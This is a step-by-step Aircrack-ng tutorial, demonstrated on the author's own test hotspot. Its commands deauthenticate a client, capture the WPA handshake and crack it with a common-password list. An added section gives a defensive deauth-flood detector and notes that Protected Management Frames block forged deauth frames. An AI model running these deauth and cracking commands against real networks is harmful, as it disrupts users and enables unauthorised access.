# Aircrack-ng

## Tutorial Video

{% embed url="<https://www.youtube.com/watch?v=zAWcu3NQLME>" %}

## Requirements

* Wi-Fi adapter that supports monitor mode.
* Linux machine or virtual machine.
* Aircrack-ng.
* List of common passwords. <https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10k-most-common.txt>

Step 1: Installation

```
sudo apt update
sudo apt-get install -y aircrack-ng 
```

Step 2: Check the available Wi-Fi cards and disable any processes that may interfere with monitor mode.

```
ip a
```

<figure><img src="https://2268061532-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo71vDQ8YHfe6Cj11Juh6%2Fuploads%2FGp0aBfDivYkpSegbNITT%2FAircrackLab01.png?alt=media&#x26;token=ea7770a5-9f2f-4849-a492-e85885d549a5" alt=""><figcaption></figcaption></figure>

The internal Wi-Fi card can interfere with the deauth process, so we set it to down with this command.

```
sudo ifconfig wlan0 down
```

This command checks for any processes that may interfere with our Wi-Fi adapter in monitor mode.

```
sudo airmon-ng check
```

This command then kills any of the processes listed from the command above.

```
sudo airmon-ng check kill
```

<figure><img src="https://2268061532-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo71vDQ8YHfe6Cj11Juh6%2Fuploads%2FILhYdKzZzUM7C74QmwZl%2FAircrackLab03.png?alt=media&#x26;token=819510a0-b4d6-42f7-be7b-85e5eb909e95" alt=""><figcaption></figcaption></figure>

Step 3: The next command will set the Wi-Fi adapter into monitor mode.

```
sudo airmon-ng start wlan1
```

<figure><img src="https://2268061532-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo71vDQ8YHfe6Cj11Juh6%2Fuploads%2F4AtriEFTOigrJuWTt9Xm%2FAircrackLab04.png?alt=media&#x26;token=89960b9b-19a0-420f-a232-8e312c547f78" alt=""><figcaption></figcaption></figure>

Step 4: Next we want to grab the hex value (the BSSID, i.e. the MAC address) of our target network.

```
sudo airodump-ng wlan1mon
```

<figure><img src="https://2268061532-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo71vDQ8YHfe6Cj11Juh6%2Fuploads%2Fz0B8zwEIwLJ8QrFXwERx%2FAircrackLab05.png?alt=media&#x26;token=1fcbf5da-24fd-4d12-b910-001e172c7a87" alt=""><figcaption></figcaption></figure>

Our hotspot named TestNetwork seems to be operating on channel 6 with the shown MAC address.

Step 5: Now we only want to listen to devices trying to connect to our target network so we run the following command.

```
sudo airodump-ng -c 6 -w capture -d (YOUR TARGET'S HEX VALUE) wlan1mon
```

<figure><img src="https://2268061532-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo71vDQ8YHfe6Cj11Juh6%2Fuploads%2FrNa4iDg7jc9U7SnmCySb%2FAircrackLab06.png?alt=media&#x26;token=199bfcad-b2d3-469c-861d-3c6fbedd1661" alt=""><figcaption></figcaption></figure>

Step 6: Now we can see the network and a device that is currently connected. We want to deauth this device from the network and capture the WPA handshake when it attempts to re-join the network.

```
sudo aireplay-ng --deauth 0 -a (NETWORK HASH) -c (DEVICE HASH) wlan1mon
```

{% hint style="info" %}
The network hash is the first BSSID and the device hash is the second listed station. Both values are MAC addresses, not hashes.
{% endhint %}

<figure><img src="https://2268061532-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo71vDQ8YHfe6Cj11Juh6%2Fuploads%2F40Z4Y6JFLjGS271xOw1m%2FAircrackLab07.png?alt=media&#x26;token=7eabadcb-d730-4257-b212-555542c70026" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2268061532-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo71vDQ8YHfe6Cj11Juh6%2Fuploads%2FxmfO9Vx3w3bYygESv5ka%2FAircrackLab08.png?alt=media&#x26;token=20d76164-62b8-4ff0-bf85-9202b6ffc3b3" alt=""><figcaption></figcaption></figure>
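From the defender's side, the continuous deauthentication in step 6 shows up as a sustained burst of deauth frames aimed at one client. The following added example (not part of the original tutorial) counts deauth frames per BSSID/station pair in a sliding window; the `seconds,subtype,bssid,station` record layout, the threshold values and the MAC addresses are constructed for illustration and are not the output of any real tool.

```python
from collections import defaultdict, deque

def parse(line):
    """Split one 'seconds,subtype,bssid,station' record; None if malformed."""
    parts = [p.strip().lower() for p in line.split(",")]
    if len(parts) != 4:
        return None
    try:
        return float(parts[0]), parts[1], parts[2], parts[3]
    except ValueError:
        return None

def detect_deauth_floods(lines, window=1.0, threshold=10):
    """Return {(bssid, station): peak} for pairs whose deauth frame count
    inside any `window` seconds reaches `threshold` (input in time order)."""
    recent = defaultdict(deque)  # (bssid, station) -> timestamps still in window
    peaks = {}
    for line in lines:
        rec = parse(line)
        if rec is None or rec[1] != "deauth":
            continue  # skip malformed records and other frame types
        ts, _, bssid, station = rec
        q = recent[(bssid, station)]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()  # drop frames that fell out of the window
        if len(q) >= threshold:
            key = (bssid, station)
            peaks[key] = max(peaks.get(key, 0), len(q))
    return peaks

# Constructed sample data: made-up, locally administered MAC addresses.
AP = "02:00:00:aa:bb:01"
CLIENT = "02:00:00:cc:dd:02"
OTHER = "02:00:00:cc:dd:03"
SAMPLE = (
    [f"0.00,beacon,{AP},ff:ff:ff:ff:ff:ff",
     f"0.20,deauth,{AP},{OTHER}",  # single frame: an ordinary disconnect
     "garbage line"]               # malformed record, ignored
    + [f"{1 + i * 0.02:.2f},deauth,{AP},{CLIENT}" for i in range(40)]  # burst
)

if __name__ == "__main__":
    for (bssid, station), peak in detect_deauth_floods(SAMPLE).items():
        print(f"ALERT deauth flood bssid={bssid} station={station} peak={peak}")
```

On networks that support it, enabling 802.11w Protected Management Frames (mandatory in WPA3) lets clients reject forged deauthentication frames.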

Step 7: Once we have captured the WPA handshake, we can turn off monitor mode on our adapter and attempt to crack the password using a list of commonly used passwords.

```
sudo airmon-ng stop wlan1mon
```

<figure><img src="https://2268061532-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo71vDQ8YHfe6Cj11Juh6%2Fuploads%2FaYSvQvfMeLPNxt98H9Lm%2FAircrackLab09.png?alt=media&#x26;token=b26187e5-4c2d-4515-9b95-e237d63906b6" alt=""><figcaption></figcaption></figure>

```
sudo aircrack-ng (YOUR CAPTURE FILE) -w (YOUR PASSWORD LIST DIRECTORY) 
```

{% hint style="info" %}
Your capture file will be saved to your device. There may be multiple capture files so use the most recent one created.
{% endhint %}

<figure><img src="https://2268061532-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo71vDQ8YHfe6Cj11Juh6%2Fuploads%2FrjZIps8NaH4CJAzjH5Dt%2FAircrackLab10.png?alt=media&#x26;token=67bdbaa3-a2a8-4df6-ace7-0371b9000c21" alt=""><figcaption></figcaption></figure>

Step 8: Congrats!!! 🥳🥳🥳 You have just learned how to use Aircrack-ng to capture and crack a WPA handshake.

{% hint style="info" %}
I am not liable for any misuse of this knowledge. This tutorial is for educational purposes only.
{% endhint %}
